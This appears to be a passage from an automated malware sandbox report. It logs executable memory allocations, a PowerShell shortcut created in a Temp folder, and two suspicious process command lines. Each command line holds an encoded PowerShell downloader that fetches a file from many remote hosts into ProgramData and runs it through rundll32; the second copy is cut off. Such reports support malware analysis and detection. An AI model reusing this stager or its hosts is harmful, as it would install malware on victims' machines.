NtAllocateVirtualMemory May 25, 2023, 10:43 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024d2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:43 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02525000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:43 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:43 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024dc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:43 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:43 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:43 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0252c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:43 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024d3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:43 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024d4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:43 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024d5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:43 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024d6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:43 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024d7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:43 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024d8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:43 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024d9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:43 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:43 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f11000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:43 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f12000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:43 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f13000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:43 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f14000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:43 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f15000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:43 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f16000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:43 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f17000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:43 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f18000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:43 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f19000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:43 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f1a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:43 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f1b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:43 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f1c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:43 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f1d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:43 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f1e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:43 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f1f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:43 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:43 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f21000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:43 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f22000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:43 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f23000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 25, 2023, 10:43 a.m.	process_identifier: 2736 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f24000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline

powershell -encodedcommand "JABsAGEAbgBvAGwAaQBuAGUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAOABBAGQAZwBCAGwAQQBIAEkAQQBkAEEAQgBvAEEASABJAEEAWgBRAEIAMwBBAEUAdwBBAFkAUQBCAGsAQQBHAGsAQQBaAGcAQgA1AEEAQwA0AEEAWgBRAEIAaABBAEgASQBBAGQAQQBCAG8AQQBBAD0APQBEAFQAcABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAE0AQQBZAFEAQgA1AEEASABVAEEAYwB3AEIAbABBAEgATQBBAFQAQQBCAGgAQQBHAEkAQQBiAHcAQgB5AEEARwBFAEEAYgBnAEIAMABBAEMANABBAGQAQQBCAHAAQQBIAEkAQQBiAHcAQgBzAEEAQQA9AD0ARABUAHAAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABjAEEATQBnAEEAdQBBAEQAWQBBAE8AUQBBAHUAQQBEAFEAQQBOAHcAQQB1AEEARABjAEEATwBBAEEAPQBEAFQAcABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGcAQQBOAGcAQQB1AEEARABFAEEATQB3AEEAeQBBAEMANABBAE0AUQBBADEAQQBEAGsAQQBMAGcAQQB5AEEARABBAEEATQBnAEEAPQAiADsAJABjAHIAdQBzAHQAYQBjAGUAbwBsAG8AZwBpAHMAdAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAVQBBAE4AZwBBAHUAQQBEAEUAQQBOAEEAQQAzAEEAQwA0AEEATQBRAEEAeQBBAEQAWQBBAEwAZwBBAHgAQQBEAFkAQQBOAFEAQQA9AE4AQQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEkAQQBOAEEAQQB1AEEARABFAEEATgBBAEEAeQBBAEMANABBAE0AUQBBADMAQQBEAEUAQQBMAGcAQQB4AEEARABjAEEATwBRAEEAPQBOAEEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBFAEEAZABRAEIAcABBAEcAVQBBAGMAdwBCAGoAQQBHAFUAQQBiAGcAQgBqAEEARwBVAEEAVQBBAEIAeQBBAEcAVQBBAGMAdwBCADAAQQBHAGsAQQBaAHcAQgBwAEEARwBFAEEAZABBAEIAcABBAEcAOABBAGIAZwBBAHUAQQBHAHcAQQBiAHcAQgBoAEEARwA0AEEATgBBAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AdwBBAHkAQQBDADQAQQBOAEEAQQB3AEEAQwA0AEEATQBRAEEAMgBBAEQAUQBBAEwAZwBBAHgAQQBEAEEAQQBNAHcAQQA9ACIAOwAkAHMAdABvAHIAYQB4ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAwAEEARABZAEEATABnAEEAMQBBAEQAVQBBAEwAZwBBADAAQQBEAEkAQQBMAGcAQQAxAEEARABRAEEAegBVAD0AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABZAEEATgBRAEEAdQBBAEQAawBBAE4AUQBBAHUAQQBEAEkAQQBNAFEAQQAyAEEAQwA0AEEATQBnAEEAdwBBAEQAWQBBAHoAVQA9AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcATQBBAGEAUQBCADIAQQBHAFUAQQBkAEEAQgB2AEEARwA0AEEAWgBRAEIAUwBBAEcARQBBAGIAUQBCAHoAQQBIAFEAQQBaAFEAQgBoAEEARwBRAEEATABnAEIAcwBBAEgAUQBBAFoAQQBCAGgAQQBBAD0APQB6AFUAPQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAGwAQQBHADQAQQBkAEEAQgB5AEEARwBFAEEAYQBRAEIAdQBBAEMANABBAGEAUQBCAHoAQQBBAD0APQAiADsAJABPAHUAdABzAGkAZwBoAEgAYQBkAGgAcgBhAG0AYQB1AHQAaQBhAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADIAQQBEAEEAQQBMAGcAQQA0AEEARABnAEEATABnAEEAeABBAEQAUQBBAE4AdwBBAHUAQQBEAEkAQQBOAEEAQQB6AEEAQwA4AEEAVwBRAEIAcQBBAEYASQBBAEwAdwBCAEgAQQBFADgAQQBkAGcAQgA0AEEARQBVAEEAcQBzAHQAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEUAQQBNAEEAQQB1AEEARABFAEEATQB3AEEANABBAEMANABBAE8AQQBBADIAQQBDADQAQQBNAFEAQQAxAEEARABnAEEATAB3AEIAcABBAEcARQBBAEwAdwBCAEsAQQBBAD0APQBxAHMAdABmAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQARQBBAE8AQQBBAHUAQQBEAFUAQQBOAHcAQQB1AEEARABFAEEATgBRAEEAdwBBAEMANABBAE0AUQBBAHkAQQBEAEUAQQBMAHcAQgBNAEEASABBAEEATQBRAEIAcQBBAEgAWQBBAEwAdwBCAFQAQQBBAD0APQBxAHMAdABmAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE0AUQBBAHcAQQBEAFEAQQBMAHcAQgBVAEEARQB3AEEAUgB3AEIAbwBBAEUANABBAFoAQQBBAHYAQQBHADAAQQBNAEEAQgBHAEEARwBjAEEAUgB3AEEAMwBBAEcAcwBBAGIAZwBBAD0AcQBzAHQAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AZwBBAHoAQQBDADQAQQBOAGcAQQB4AEEAQwA4AEEATwBRAEIAaABBAEQAWQBBAE4AdwBCAHcAQQBHAFUAQQBjAHcAQQB2AEEARQB3AEEAVwBBAEIAdABBAEQASQBBAE4AUQBCAFQAQQBHAEUAQQBTAEEAQgBOAEEARgBvAEEATQB3AEEAPQBxAHMAdABmAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE8AUQBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAMQBBAEQAawBBAEwAZwBBADUAQQBEAGcAQQBMAHcAQgBRAEEASABBAEEAVgBRAEIAWgBBAEYAZwBBAEwAdwBCAHQAQQBIAEEAQQBhAEEAQgBJAEEARQBnAEEAYwBRAEIARwBBAEUAdwBBAFEAdwBCAHIAQQBGAGcAQQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJAB0AGEAdABhAHUAcABhAEQAaQBnAGkAdABhAGwAaQBuACAAaQBuACAAJABPAHUAdABzAGkAZwBoAEgAYQBkAGgAcgBhAG0AYQB1AHQAaQBhAG4AIAAtAHMAcABsAGkAdAAgACIAcQBzAHQAZgAiACkAIAB7AHQAcgB5ACAAewAkAFMAYQBuAGcAdQBpAHMAdQBnAG8AdQBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABBAEEATgBnAEEAdQBBAEQARQBBAE8AUQBBADEAQQBDADQAQQBNAFEAQQAwAEEARABRAEEATABnAEEAMABBAEQAUQBBAE4AcgBkAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYASQBBAFoAUQBCADMAQQBHADgAQQBjAGcAQgByAEEASABNAEEATABnAEIAbgBBAEcAawBBAFoAZwBCADAAQQBIAE0AQQBOAHIAZABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAGcAQQBMAGcAQQB5AEEARABJAEEATQB3AEEAdQBBAEQARQBBAE0AQQBBADAAQQBDADQAQQBPAEEAQQAyAEEAQQA9AD0ATgByAGQAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBBAEEAMwBBAEMANABBAE0AUQBBAHcAQQBEAEkAQQBMAGcAQQAxAEEARABJAEEATABnAEEANABBAEQATQBBACIAOwAkAHAAaABvAGwAaQBvAHQAYQBVAG4AYQBnAHIAZQBlAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHQAYQB0AGEAdQBwAGEARABpAGcAaQB0AGEAbABpAG4AKQApADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAJABwAGgAbwBsAGkAbwB0AGEAVQBuAGEAZwByAGUAZQBpAG4AZwAgAC0ATwAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABnAHIAdQBuAHQAbABpAG4AZwBNAGUAdABoAGUAcgAuAGcAZQBvAG0AYQBuAHQAaQBjAFQAaAB5AHIAbwBpAGQAZQBhADsAJAB3AGgAbwBsAGUAcwBhAGwAZQBuAGUAcwBzAEkAbgB0AHUAYgBhAHQAbwByACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBBAEEAYwBnAEIAbABBAEgAUQBBAGMAZwBCAGgAQQBHADQAQQBjAHcAQgB0AEEARwBrAEEAZABBAEIAMABBAEcAawBBAGIAZwBCAG4AQQBDADQAQQBZAGcAQgBsAEEASABRAEEATQBBAHYAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABJAEEATwBBAEEAdQBBAEQAWQBBAE8AQQBBAHUAQQBEAFEAQQBNAFEAQQB1AEEARABZAEEATwBRAEEAPQBNAEEAdgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAEUAQQBZAHcAQgBqAEEARwBrAEEAWgBBAEIAbABBAEcANABBAGQAQQBCAHMAQQBIAGsAQQBMAGcAQgAzAEEARwBVAEEAWgBBAEIAawBBAEcAawBBAGIAZwBCAG4AQQBBAD0APQAiADsAJABVAG4AZABlAHIAYwByAHUAcwB0ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBBAEEANQBBAEMANABBAE0AZwBBAHcAQQBEAGcAQQBMAGcAQQAwAEEARABFAEEATABnAEEAeABBAEQARQBBAE4AUQBBAD0AIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAZwByAHUAbgB0AGwAaQBuAGcATQBlAHQAaABlAHIALgBnAGUAbwBtAGEAbgB0AGkAYwBUAGgAeQByAG8AaQBkAGUAYQApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADIAMwA2ADMAMAAwACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEASgBBAEIAbABBAEcANABBAGQAZwBBADYAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAFIAQQBCAGgAQQBIAFEAQQBZAFEAQgBjAEEARwBjAEEAYwBnAEIAMQBBAEcANABBAGQAQQBCAHMAQQBHAGsAQQBiAGcAQgBuAEEARQAwAEEAWgBRAEIAMABBAEcAZwBBAFoAUQBCAHkAQQBDADQAQQBaAHcAQgBsAEEARwA4AEEAYgBRAEIAaABBAEcANABBAGQAQQBCAHAAQQBHAE0AQQBWAEEAQgBvAEEASABrAEEAYwBnAEIAdgBBAEcAawBBAFoAQQBCAGwAQQBHAEUAQQBMAEEAQgBpAEEARwBrAEEAYgBnAEIAawBBAEQAcwBBACIAOwAkAEwAbwB0AG0AZQBuAHQATgBlAHAAaAByAG8AZABpAG4AaQBjACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBrAEEARwBVAEEAWQBnAEIAcwBBAEcAOABBAFkAdwBCAHIAQQBFAEUAQQBiAEEAQgBwAEEARwAwAEEAWgBRAEIAdQBBAEgAUQBBAFkAUQBCAHMAQQBDADQAQQBhAFEAQgB6AEEAQQA9AD0ASgBFAFQATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADEAQQBEAGcAQQBMAGcAQQB4AEEARABNAEEATQBBAEEAdQBBAEQARQBBAE4AZwBBAHgAQQBDADQAQQBNAFEAQQA0AEEARABNAEEASgBFAFQATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAE0AQQBPAFEAQQB1AEEARABFAEEATwBRAEEANABBAEMANABBAE0AUQBBADQAQQBEAGsAQQBMAGcAQQA1AEEARABBAEEAIgA7ACQATgBvAG4AcAB1AG4AYwB0AHUAYQB0AGkAbwBuACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAwAEEARABVAEEATABnAEEAeABBAEQAawBBAE4AQQBBAHUAQQBEAFkAQQBOAGcAQQB1AEEARABnAEEATQBBAEEAPQAiADsAJABjAG8AdQBuAHQAZQByAHIAbwB1AG4AZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE8AUQBBAHoAQQBDADQAQQBNAFEAQQAxAEEARABjAEEATABnAEEAeABBAEQAZwBBAE4AdwBBAHUAQQBEAFkAQQBNAEEAQQA9AHMAaQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBOAGcAQQA0AEEAQwA0AEEATQBRAEEANABBAEQATQBBAEwAZwBBAHgAQQBEAEkAQQBNAGcAQQB1AEEARABFAEEATgBRAEEANQBBAEEAPQA9ACIAOwBiAHIAZQBhAGsAOwB9AH0AIABjAGEAdABjAGgAIAB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADMAOwB9AH0A"

cmdline

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABsAGEAbgBvAGwAaQBuAGUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAOABBAGQAZwBCAGwAQQBIAEkAQQBkAEEAQgBvAEEASABJAEEAWgBRAEIAMwBBAEUAdwBBAFkAUQBCAGsAQQBHAGsAQQBaAGcAQgA1AEEAQwA0AEEAWgBRAEIAaABBAEgASQBBAGQAQQBCAG8AQQBBAD0APQBEAFQAcABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAE0AQQBZAFEAQgA1AEEASABVAEEAYwB3AEIAbABBAEgATQBBAFQAQQBCAGgAQQBHAEkAQQBiAHcAQgB5AEEARwBFAEEAYgBnAEIAMABBAEMANABBAGQAQQBCAHAAQQBIAEkAQQBiAHcAQgBzAEEAQQA9AD0ARABUAHAAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABjAEEATQBnAEEAdQBBAEQAWQBBAE8AUQBBAHUAQQBEAFEAQQBOAHcAQQB1AEEARABjAEEATwBBAEEAPQBEAFQAcABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGcAQQBOAGcAQQB1AEEARABFAEEATQB3AEEAeQBBAEMANABBAE0AUQBBADEAQQBEAGsAQQBMAGcAQQB5AEEARABBAEEATQBnAEEAPQAiADsAJABjAHIAdQBzAHQAYQBjAGUAbwBsAG8AZwBpAHMAdAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAVQBBAE4AZwBBAHUAQQBEAEUAQQBOAEEAQQAzAEEAQwA0AEEATQBRAEEAeQBBAEQAWQBBAEwAZwBBAHgAQQBEAFkAQQBOAFEAQQA9AE4AQQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEkAQQBOAEEAQQB1AEEARABFAEEATgBBAEEAeQBBAEMANABBAE0AUQBBADMAQQBEAEUAQQBMAGcAQQB4AEEARABjAEEATwBRAEEAPQBOAEEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBFAEEAZABRAEIAcABBAEcAVQBBAGMAdwBCAGoAQQBHAFUAQQBiAGcAQgBqAEEARwBVAEEAVQBBAEIAeQBBAEcAVQBBAGMAdwBCADAAQQBHAGsAQQBaAHcAQgBwAEEARwBFAEEAZABBAEIAcABBAEcAOABBAGIAZwBBAHUAQQBHAHcAQQBiAHcAQgBoAEEARwA0AEEATgBBAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AdwBBAHkAQQBDADQAQQBOAEEAQQB3AEEAQwA0AEEATQBRAEEAMgBBAEQAUQBBAEwAZwBBAHgAQQBEAEEAQQBNAHcAQQA9ACIAOwAkAHMAdABvAHIAY